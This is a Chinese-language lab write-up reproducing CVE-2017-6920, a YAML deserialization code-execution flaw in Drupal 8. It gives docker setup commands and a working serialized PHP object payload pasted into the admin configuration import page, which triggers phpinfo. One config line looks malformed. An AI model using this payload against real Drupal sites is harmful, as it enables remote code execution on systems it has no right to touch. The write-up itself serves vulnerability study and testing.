menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 037-Drupal chevron_right 002-CVE-2017-6920 Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    002-CVE-2017-6920 Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞.md
    2.89 KB / 2021-07-17 00:01:22
        # CVE-2017-6920 Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞
    
    ### 一、漏洞简介
    
    Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal7.56之前的7.x版本和8.3.4之前的8.x版本中存在远程代码执行漏洞。远程攻击者可利用该漏洞在受影响应用程序上下文中执行任意代码或造成拒绝服务。
    
    ### 二、漏洞影响
    
    Drupal Drupal 8.3.3 Drupal Drupal 8.3.2 Drupal Drupal 8.3.1 Drupal Drupal 8.2.8 Drupal Drupal 8.2.7 Drupal Drupal 8.2.3 Drupal Drupal 8.2.2
    
    ### 三、复现过程
    
    漏洞环境
    
    执行如下命令启动 drupal 8.3.0 的环境:
    
    
    ```
    docker-compose up -d
    ```
    
    环境启动后,访问 `http://your-ip:8080/` 将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。
    
    **漏洞复现**
    
    先安装 yaml 扩展
    
    
    ```bash
    # 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源
    cat > sources.list << EOF
    deb http://mirrors.163.com/debian/ jessie main non-free contrib
    deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib
    deb http://mirrors.163.com/debian/ jessie-backports main non-free contrib
    deb-src http://mirrors.163.com/debian/ jessie main non-free contrib
    deb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib
    deb-src http://mirrors.163.com/debian/ jessie-backports main non-free contrib
    deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib
    deb-src http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib
    EOF
    # 安装依赖
    apt update
    apt-get -y install gcc make autoconf libc-dev pkg-config
    apt-get -y install libyaml-dev
    # 安装yaml扩展
    pecl install yaml
    docker-php-ext-enable yaml.so
    # 启用 yaml.decode_php 否则无法复现成功
    echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini
    # 退出容器
    exit
    # 重启容器,CONTAINER换成自己的容器ID
    docker restart CONTAINER
    ```
    
    * 1.登录一个管理员账号
    * 2.访问 http://127.0.0.1:8080/admin/config/development/configuration/single/import
    * 3.如下图所示,Configuration type 选择 Simple configuration,Configuration name 任意填写,Paste your configuration here 中填写PoC如下:
    
    
    ```bash
    !php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
    ```
    
    ![](images/15889986043150.png)
    
    
    4.点击 Import 后可以看到漏洞触发成功,弹出 phpinfo 页面
    
    ![](images/15889986121361.png)
    
    
    Tips:
    
    虽然官方 CPE 信息显示从 8.0.0 开始就有该漏洞,但是在 drupal:8.0.0 容器内并没有复现成功,相同操作在 drupal:8.3.0 则可以复现成功,故基础镜像选择drupal:8.3.0
    
    参考链接
    
    https://vulhub.org/#/environments/drupal/CVE-2017-6920/
    
    links
    file_download